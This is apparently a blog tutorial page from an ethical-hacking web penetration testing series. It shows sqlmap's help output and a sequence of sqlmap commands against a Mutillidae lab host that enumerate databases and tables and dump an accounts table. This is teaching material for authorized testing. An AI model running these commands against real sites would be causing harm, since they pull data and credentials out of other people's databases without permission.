SQL INJECTION

SQLMAP

  • Tool designed to exploit SQL injections.
  • Works with many DB types, MySQL, MSSQL ...etc.
>sqlmap --help

>sqlmap -u [target URL]

Following are examples:

sqlmap -u "http://10.0.0.24/mutillidae/index.php?page=user-info.php&username=admin&password=aaaaa&user-info-php-submit-button=View+Account+Details"

You can find more functions>

root@kali:~# sqlmap --help

        ___

       __H__

 ___ ___[']_____ ___ ___  {1.4#stable}

|_ -| . [,]     | .'| . |

|___|_  [.]_|_|_|__,|  _|

      |_|V...       |_|   http://sqlmap.org

Usage: python3 sqlmap [options]

Options:

  -h, --help            Show basic help message and exit

  -hh                   Show advanced help message and exit

  --version             Show program's version number and exit

  -v VERBOSE            Verbosity level: - (default )

  Target:

    At least one of these options has to be provided to define the

    target(s)

    -u URL, --url=URL   Target URL (e.g. "http://www.site.com/vuln.php?id=1")

    -g GOOGLEDORK       Process Google dork results as target URLs

  Request:

    These options can be used to specify how to connect to the target URL

    --data=DATA         Data string to be sent through POST (e.g. "id=1")

    --cookie=COOKIE     HTTP Cookie header value (e.g. "PHPSESSID=a8d127e..")

    --random-agent      Use randomly selected HTTP User-Agent header value

    --proxy=PROXY       Use a proxy to connect to the target URL

    --tor               Use Tor anonymity network

    --check-tor         Check to see if Tor is used properly

  Injection:

    These options can be used to specify which parameters to test for,

    provide custom injection payloads and optional tampering scripts

    -p TESTPARAMETER    Testable parameter(s)

    --dbms=DBMS         Force back-end DBMS to provided value

  Detection:

    These options can be used to customize the detection phase

    --level=LEVEL       Level of tests to perform (-, default )

    --risk=RISK         Risk of tests to perform (-, default )

  Techniques:

    These options can be used to tweak testing of specific SQL injection

    techniques

    --technique=TECH..  SQL injection techniques to use (default "BEUSTQ")

  Enumeration:

    These options can be used to enumerate the back-end database

    management system information, structure and data contained in the

    tables

    -a, --all           Retrieve everything

    -b, --banner        Retrieve DBMS banner

    --current-user      Retrieve DBMS current user

    --current-db        Retrieve DBMS current database

    --passwords         Enumerate DBMS users password hashes

    --tables            Enumerate DBMS database tables

    --columns           Enumerate DBMS database table columns

    --schema            Enumerate DBMS schema

    --dump              Dump DBMS database table entries

    --dump-all          Dump all DBMS databases tables entries

    -D DB               DBMS database to enumerate

    -T TBL              DBMS database table(s) to enumerate

    -C COL              DBMS database table column(s) to enumerate

  Operating system access:

    These options can be used to access the back-end database management

    system underlying operating system

    --os-shell          Prompt for an interactive operating system shell

    --os-pwn            Prompt for an OOB shell, Meterpreter or VNC

  General:

    These options can be used to set some general working parameters

    --batch             Never ask for user input, use the default behavior

    --flush-session     Flush session files for current target

  Miscellaneous:

    These options do not fit into any other category

    --sqlmap-shell      Prompt for an interactive sqlmap shell

    --wizard            Simple wizard interface for beginner users

Let try some of the common functions.

sqlmap -u "http://10.0.0.24/mutillidae/index.php?page=user-info.php&username=admin&password=aaaaa&user-info-php-submit-button=View+Account+Details" --dbs

sqlmap -u "http://10.0.0.24/mutillidae/index.php?page=user-info.php&username=admin&password=aaaaa&user-info-php-submit-button=View+Account+Details" --current-user

sqlmap -u "http://10.0.0.24/mutillidae/index.php?page=user-info.php&username=admin&password=aaaaa&user-info-php-submit-button=View+Account+Details" --current-db

sqlmap -u "http://10.0.0.24/mutillidae/index.php?page=user-info.php&username=admin&password=aaaaa&user-info-php-submit-button=View+Account+Details" --tables -D owasp10

sqlmap -u "http://10.0.0.24/mutillidae/index.php?page=user-info.php&username=admin&password=aaaaa&user-info-php-submit-button=View+Account+Details" --columns -T accounts -D owasp10

sqlmap -u "http://10.0.0.24/mutillidae/index.php?page=user-info.php&username=admin&password=aaaaa&user-info-php-submit-button=View+Account+Details" -T accounts -D owasp10 --dump

Ethical Hacking - Web Penetration Testing(10)的更多相关文章

  1. Ethical Hacking - Web Penetration Testing(13)

    OWASP ZAP(ZED ATTACK PROXY) Automatically find vulnerabilities in web applications. Free and easy to ...

  2. Ethical Hacking - Web Penetration Testing(8)

    SQL INJECTION WHAT IS SQL? Most websites use a database to store data. Most data stored in it(userna ...

  3. Ethical Hacking - Web Penetration Testing(6)

    REMOTE FILE INCLUSION Similar to local file inclusion. But allows an attacker to read ANY file from ...

  4. Python Ethical Hacking - WEB PENETRATION TESTING(2)

     CRAWING DIRECTORIES Directories/folders inside the web root. Can contain files or other directories ...

  5. Ethical Hacking - Web Penetration Testing(12)

    XSS VULNS XSS - CROSS SITE SCRIPTING VULNS Allow an attacker to inject javascript code into the page ...

  6. Ethical Hacking - Web Penetration Testing(5)

    LOCAL FILE INCLUSION Allows an attacker to read ANY file on the same server. Access files outside ww ...

  7. Ethical Hacking - Web Penetration Testing(4)

    CODE EXECUTION VULNS Allows an attacker to execute OS commands. Windows or Linux commands. Can be us ...

  8. Ethical Hacking - Web Penetration Testing(2)

    INFORMATION GATHERING IP address. Domain name Info. Technologies used. Other websites on the same se ...

  9. Ethical Hacking - Web Penetration Testing(1)

    How to hack a website? An application installed on a computer. ->web application pen-testing A co ...

随机推荐

  1. 基于 abp vNext 和 .NET Core 开发博客项目 - Blazor 实战系列(八)

    系列文章 基于 abp vNext 和 .NET Core 开发博客项目 - 使用 abp cli 搭建项目 基于 abp vNext 和 .NET Core 开发博客项目 - 给项目瘦身,让它跑起来 ...

  2. frp多层socks代理+端口映射

    一.首先在公网上配置服务端(frps.ini) [common] bind_addr = xx.xx.xx.xx #公网vps的ip bind_port = 7000   二.配置客户端frpc. i ...

  3. 登录CentOS用户很慢/usr/bin/xauth: timeout in locking authority file /home/***/.Xauthority

    当使用非root用户登录CentOS时,发现很慢,而且弹出以下信息: /usr/bin/xauth:  timeout in locking authority file /home/***/.Xau ...

  4. ​Shiro授权

    Shiro三种授权方式 编程式:通过写 if/else 授权代码块完成: Subject subject = SecurityUtils.getSubject(); if(subject.hasRol ...

  5. 谈谈我对 Flutter 未来发展 和 “嵌套地狱” 的浅显看法

    Flutter 未来发展 提到 Flutter 就不得不提到 Fuchsia 系统,这是一个尚未正式发布的操作的系统,引用 Android 和 Chrome 的高级副总裁 Hiroshi Lockhe ...

  6. 查看日志文件常用命令:tail,cat,tac,head,echo

    linux查看日志文件内容命令tail.cat.tac.head.echo tail -f test.log你会看到屏幕不断有内容被打印出来. 这时候中断第一个进程Ctrl-C, ---------- ...

  7. MySQL统计库表大小

    统计每个库每个表的大小是数据治理的其中最简单的一个要求,本文将从抽样统计结果及精确统计结果两方面来统计MySQL的每个库每个表的数据量情况. 1.统计预估数据量 mysql数据字典库informati ...

  8. PDF无法复制/打印/编辑怎么办?

    PDF的内容不能复制/打印/编辑,主要有两种原因: 1.PDF文件设置了权限保护 2.PDF内容是图片 第一种,PDF被设置了权限保护 这种的特点是可以选中PDF里的文字,但无法复制 PDF格式标准内 ...

  9. 赞!7000 字学习笔记,一天搞定 MySQL

    MySQL数据库简介 MySQL近两年一直稳居第二,随时有可能超过Oracle计晋升为第一名,因为MySQL的性能一直在被优化,同时安全机制也是逐渐成熟,更重要的是开源免费的. MySQL是一种关系数 ...

  10. Sta,题解

    题目: 分析: 这个有点过于简单,两次Dfs处理出Dp[i],Son[i],Deep[i],Val[i](分别表示以1为根时i所有子树的深度之和,以1为根时i子树节点个数,以1为根时i深度,以i为根时 ...